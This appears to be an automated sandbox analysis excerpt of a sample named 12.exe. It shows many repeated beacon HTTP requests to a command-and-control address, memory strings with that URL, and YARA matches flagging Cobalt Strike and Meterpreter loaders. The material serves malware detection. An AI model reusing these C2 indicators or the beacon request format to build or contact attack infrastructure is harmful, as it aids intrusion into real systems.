                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: 12.exe, 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp, 12.exe, 00000000.00000002.4124793161.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://152.42.226.16:59060/cx
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://152.42.226.16:59060/cx1.
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://152.42.226.16:59060/cx26.16:59060/cx
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://152.42.226.16:59060/cxA-
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://152.42.226.16:59060/cxN-
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://152.42.226.16:59060/cxS-i)
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://152.42.226.16:59060/cxj-v)
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://152.42.226.16:59060/cxmswsock.dll.muiW=L)
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://152.42.226.16:59060/cxwshqos.dll.mui
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://152.42.226.16:59060/cxwshqos.dll.muip

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
